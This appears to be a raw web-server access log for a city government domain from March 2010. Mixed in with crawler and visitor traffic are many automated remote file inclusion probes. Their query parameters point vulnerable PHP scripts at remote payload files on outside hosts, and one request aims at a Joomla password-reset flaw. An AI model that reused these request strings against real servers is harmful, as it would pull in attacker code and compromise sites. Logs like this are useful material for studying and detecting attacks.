221.141.1.113 - - [01/Mar/2010:13:54:01 -0800] "GET /logs///tiny_includes/config.php?dir_ws=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
207.46.195.230 - - [01/Mar/2010:13:55:14 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
207.46.195.230 - - [01/Mar/2010:13:56:42 -0800] "GET /?S=A HTTP/1.1" 200 917 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:14:02:28 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:14:02:28 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:14:04:44 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:14:04:44 -0800] "GET /logs/access_090301.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:14:04:44 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:14:05:10 -0800] "GET /logs/access_091001.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:12:27 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:12:27 -0800] "GET /logs/access_081230.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:12:27 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:12:32 -0800] "GET /logs/access_091031.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:12:35 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:12:35 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:12:41 -0800] "GET /logs/access_081230.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:12:41 -0800] "GET /logs/access_091031.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.254.120.74 - - [01/Mar/2010:14:15:48 -0800] "GET /?option=com_user&view=reset&layout=confirm HTTP/1.1" 200 917 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4" "cityofarkadelphia.com"
88.254.120.74 - - [01/Mar/2010:14:15:48 -0800] "POST /?option=com_user&task=confirmreset HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4" "cityofarkadelphia.com"
221.141.1.113 - - [01/Mar/2010:14:17:05 -0800] "GET /logs//tiny_includes/config.php?dir_ws=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:14:19:04 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:14:19:04 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:14:19:04 -0800] "GET /logs/access_090301.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:14:19:12 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:14:19:12 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:14:19:12 -0800] "GET /logs/access_090301.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:14:19:43 -0800] "GET /logs/access_091001.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:20:05 -0800] "GET /logs/access_081230.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:20:06 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:20:06 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:20:17 -0800] "GET /logs/access_091031.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:20:29 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:20:30 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:20:30 -0800] "GET /logs/access_091031.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:21:05 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:21:05 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:21:05 -0800] "GET /logs/access_081230.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:21:05 -0800] "GET /logs/access_091031.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:21:29 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:21:33 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:21:34 -0800] "GET /logs/access_081230.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:21:34 -0800] "GET /logs/access_091031.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:14:22:05 -0800] "GET /logs/access_081230.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.195.110.164 - - [01/Mar/2010:14:31:10 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
67.195.110.164 - - [01/Mar/2010:14:31:10 -0800] "GET /Downloads/?M=A HTTP/1.0" 200 655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:14:43:11 -0800] "GET /mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:14:43:11 -0800] "GET /logs//mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:14:43:11 -0800] "GET /logs/access_091001.log//mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:14:43:11 -0800] "GET /logs/access_091231.log//mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:14:43:28 -0800] "GET /mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:14:43:28 -0800] "GET /logs/access_091231.log//mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:14:43:28 -0800] "GET /logs//mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:14:43:28 -0800] "GET /logs/access_091001.log//mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:14:43:44 -0800] "GET /mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:14:43:44 -0800] "GET /logs/access_091231.log//mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:14:43:44 -0800] "GET /logs//mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:14:43:44 -0800] "GET /logs/access_091001.log//mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:14:48:36 -0800] "GET /logs//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:14:48:36 -0800] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:14:48:36 -0800] "GET /logs/access_091101.log//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:14:48:39 -0800] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:14:48:39 -0800] "GET /logs/access_091101.log//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:14:48:39 -0800] "GET /logs//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:14:48:46 -0800] "GET /logs/access_091101.log//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:14:48:46 -0800] "GET /logs//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:14:48:46 -0800] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:14:48:54 -0800] "GET /logs/access_091101.log//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:14:48:54 -0800] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:14:48:54 -0800] "GET /logs//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:14:49:38 -0800] "GET /logs/access_091231.log//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:14:49:57 -0800] "GET /logs/access_091231.log//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:14:50:02 -0800] "GET /logs/access_091231.log//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:14:50:12 -0800] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:14:50:12 -0800] "GET /logs/access_091231.log//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:14:50:12 -0800] "GET /logs//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:14:50:26 -0800] "GET /logs/access_091231.log//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:14:51:01 -0800] "GET /logs//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:14:51:01 -0800] "GET /logs/access_091231.log//modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:14:51:01 -0800] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gslanguage=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.194.37.190 - - [01/Mar/2010:14:58:03 -0800] "GET / HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "cityofarkadelphia.com"
74.194.37.190 - - [01/Mar/2010:14:58:05 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "cityofarkadelphia.com"
74.194.37.190 - - [01/Mar/2010:14:58:05 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:15:09:32 -0800] "GET /logs/access_091001.log//mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:15:09:32 -0800] "GET /logs/access_091231.log//mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:15:09:32 -0800] "GET /logs//mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:15:09:32 -0800] "GET /mvcw.php?vwar_root=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.199.50 - - [01/Mar/2010:15:16:56 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
207.46.199.50 - - [01/Mar/2010:15:17:45 -0800] "GET /?D=A HTTP/1.1" 200 917 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
80.153.6.48 - - [01/Mar/2010:15:19:58 -0800] "HEAD / HTTP/1.0" 200 0 "-" "Lynx/2.8.7rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g" "cityofarkadelphia.com"
80.153.6.48 - - [01/Mar/2010:15:19:59 -0800] "GET / HTTP/1.0" 200 901 "-" "Lynx/2.8.7rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:15:48:06 -0800] "GET /logs/access_081231.log//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:15:48:06 -0800] "GET /logs/access_081230.log//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:15:48:06 -0800] "GET /bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:15:48:06 -0800] "GET /logs//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.199.43 - - [01/Mar/2010:15:57:12 -0800] "GET / HTTP/1.1" 200 917 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
219.93.62.74 - - [01/Mar/2010:16:03:53 -0800] "GET /logs/db.php?commonpath=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.93.62.74 - - [01/Mar/2010:16:03:53 -0800] "GET /logs/access_090701.log/db.php?commonpath=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.93.62.74 - - [01/Mar/2010:16:03:53 -0800] "GET /db.php?commonpath=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.136.23.172 - - [01/Mar/2010:16:13:35 -0800] "GET /config/dbutil.bck.php?confdir=http://rontokbro.110mb.com/files/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "cityofarkadelphia.com"
124.136.23.172 - - [01/Mar/2010:16:13:35 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://rontokbro.110mb.com/files/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "cityofarkadelphia.com"
189.89.20.27 - - [01/Mar/2010:16:34:39 -0800] "GET /logs/access_090330.log/ HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
189.89.20.27 - - [01/Mar/2010:16:34:39 -0800] "GET / HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
189.89.20.27 - - [01/Mar/2010:16:34:39 -0800] "GET /logs/ HTTP/1.1" 200 4227 "-" "Mozilla/5.0" "cityofarkadelphia.com"
189.89.20.27 - - [01/Mar/2010:16:36:19 -0800] "GET /logs/access_100201.log/ HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:16:57:08 -0800] "GET /site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:16:57:09 -0800] "GET /logs/access_091031.log//site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:16:57:09 -0800] "GET /logs//site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:16:57:09 -0800] "GET /logs/access_090301.log//site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:16:58:44 -0800] "GET /site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:16:58:44 -0800] "GET /logs/access_090301.log//site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:16:58:44 -0800] "GET /logs/access_091031.log//site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:16:58:44 -0800] "GET /logs//site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.118.102.193 - - [01/Mar/2010:17:01:59 -0800] "GET / HTTP/1.0" 200 901 "http://cityofarkadelphia.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "cityofarkadelphia.com"
